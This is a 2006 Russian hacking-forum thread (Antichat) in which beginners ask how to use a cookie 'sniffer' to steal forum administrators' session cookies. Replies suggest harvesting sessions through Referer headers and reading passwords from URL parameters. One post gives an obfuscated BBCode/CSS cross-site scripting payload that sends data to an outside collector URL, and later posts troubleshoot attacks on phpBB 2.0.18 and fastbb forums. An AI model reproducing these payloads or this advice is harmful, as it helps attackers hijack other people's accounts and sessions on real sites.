ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Простой вопрос про сниффер
  #1  
Старый 28.01.2006, 01:39
Аватар для errou
errou
Новичок
Регистрация: 27.01.2006
Сообщений: 8
Провел на форуме:
11116

Репутация: 0
По умолчанию Простой вопрос про сниффер

Народ, такой вопрос:
Сниффером мы можем получать куки. Но только куки того процесса, где был выполнен Джаваскрипт. Следовательно, для использования сниффера, в любом случае требуется искать уязвимость, пропускающую Джаваскрипт?
Тогда не очень ясен один вопрос - в статье про снифферы на Античате, неточно помню, был описан такой прием получения админских куков на форуме, как просьба посмотреть неоткрывающийся аватар (в котором сидит Js). Админу дается ссылка, и просится на нее зайти.
Но вель тогда сниффер получит куки, которые относятся к новому открытому документу - странице с картинкой, и толку от этого никакого.
То есть, главный вопрос:
Можно ли как-нибудь использовать сниффер, если нет уязвимостей, пропускающих Js?
 
Ответить с цитированием

  #2  
Старый 28.01.2006, 02:16
Аватар для bul666
bul666
Banned
Регистрация: 21.04.2005
Сообщений: 328
Провел на форуме:
632524

Репутация: 9
Отправить сообщение для bul666 с помощью ICQ
По умолчанию

Цитата:
Сообщение от errou  
Народ, такой вопрос:
Можно ли как-нибудь использовать сниффер, если нет уязвимостей, пропускающих Js?
Можно, его использовать для получения реффера (тоесть адреса, с которого зашел чел на сниффер). Так можно воровать сессии. А бывают и такие чаты, или еще ченить, где в дресе пишется
http://site/chat/?userId=1234&room=3&pwd=qwerty
Из этой строки можно узнать пароль ))))))))))))))))))))))
 
Ответить с цитированием

  #3  
Старый 28.01.2006, 22:15
Аватар для errou
errou
Новичок
Регистрация: 27.01.2006
Сообщений: 8
Провел на форуме:
11116

Репутация: 0
По умолчанию

Спасибо.
 
Ответить с цитированием

  #4  
Старый 29.01.2006, 17:27
Аватар для ZetRoX
ZetRoX
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032

Репутация: 1
По умолчанию

чтобы не создавать тему спрашиваю здесь....

когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???

очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....
сасое большое, что я получаю, это ip адрес...
 
Ответить с цитированием

  #5  
Старый 29.01.2006, 19:30
Аватар для •••™NO FEAR™•••
•••™NO FEAR™•••
Постоянный
Регистрация: 08.08.2005
Сообщений: 782
Провел на форуме:
6573706

Репутация: 1419


По умолчанию

Цитата:
чтобы не создавать тему спрашиваю здесь....

когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???

очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....
сасое большое, что я получаю, это ip адрес..
Ха-ха-ха-ха.... Я ща умру от смеха))))
Где ты в JS видел такое??? Например:
Код:
[HT*ML][co*lor=white][EM*AIL][U*RL=wj`=`][/URL][/EMA*IL][/color]` style=`background:url(javascript:document.images[1].src="http://s.netsec.ru/nofear/pic.gif?;"+админ@yandex.ru.txt)`
Если это щас увидят знающие люди, они сдохнут со смеха )))

Последний раз редактировалось •••™NO FEAR™•••; 29.01.2006 в 19:34..
 
Ответить с цитированием

Мдаааааааааа!!!
  #6  
Старый 29.01.2006, 19:30
Аватар для Utochka
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718

Репутация: 268


По умолчанию Мдаааааааааа!!!

Цитата:
Сообщение от ZetRoX  
когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???
Ты вообще сам понял, что спросил! И че ты надеялся получить если бы ты написал вместо document.cookie -
админ@yandex.ru.txt. Немного подумав я сделал вывод что ты видимо хотел получить некий файл админ@yandex.ru.txt или файл админа с yandex.ru под названием yandex.ru.txt, ХА ХА ХА!!! ОБЛОМИСЬ ИМХО!!! =)

Цитата:
Сообщение от ZetRoX  
очень важно, а то у меня ни разу не получалось получить файл...а точнее куки....
Ну и не получиться!
Цитата:
Сообщение от ZetRoX  
сасое большое, что я получаю, это ip адрес...
Честно говоря с первого раза я не понял этого предложения =).
Поверь мне ты получишь не только ip адресс, хотя..... наверное ТЫ ничего не получишь.....

УЧИ МАТ ЧАСТЬ, ИМХО!!!!!!!!
 
Ответить с цитированием

  #7  
Старый 29.01.2006, 20:16
Аватар для Electro
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
Провел на форуме:
1095453

Репутация: 113
Отправить сообщение для Electro с помощью ICQ
По умолчанию

СДОХНУТЬ МОЖНО!!!!!!!!!!)))))))))))))))))))))))))))))) )))))))))))))))))))))))))) ну и ЛОЛЛЛЛЛЛЛЛЛ

когда мы пишем ссыдку на сниффер, то пишем ...+document.cookie а надо имеено это писать или заменять??? например, ....+админ@yandex.ru.txt???
 
Ответить с цитированием

  #8  
Старый 29.01.2006, 22:16
Аватар для ZetRoX
ZetRoX
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032

Репутация: 1
По умолчанию

ну хорошо, лоханулся....

а в чем тогда проблема??? я даже на себе проверял.....пишу я нужный код, с помощью кодера (ну, ссылки на них где-то давали).....в сообщении оставляю ссылку, сам кликаю и на снифак приходит только Ip адрес жертвы....

что делать....ну помогите начинающему...все же когда-то были такими....
 
Ответить с цитированием

  #9  
Старый 29.01.2006, 22:56
Аватар для TTyck
TTyck
Участник форума
Регистрация: 13.11.2005
Сообщений: 199
Провел на форуме:
824195

Репутация: 75
Отправить сообщение для TTyck с помощью ICQ
По умолчанию

НА чем ты тестишь? НА форуме? Движок и версия какая?
 
Ответить с цитированием

  #10  
Старый 30.01.2006, 00:04
Аватар для ZetRoX
ZetRoX
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032

Репутация: 1
По умолчанию

да на форумах.....phpbb 2.0.18 или fastbb (версию не помню, но не самаЯ последняя, где-то предпоследняя...)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос про отправку кук на сниффер http://antichat.ru/cgi-bin/s.jpg? Форумы 21 24.07.2005 20:56
Вопрос по чатам от http://www.maxchat.ru Чаты 3 21.12.2002 08:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ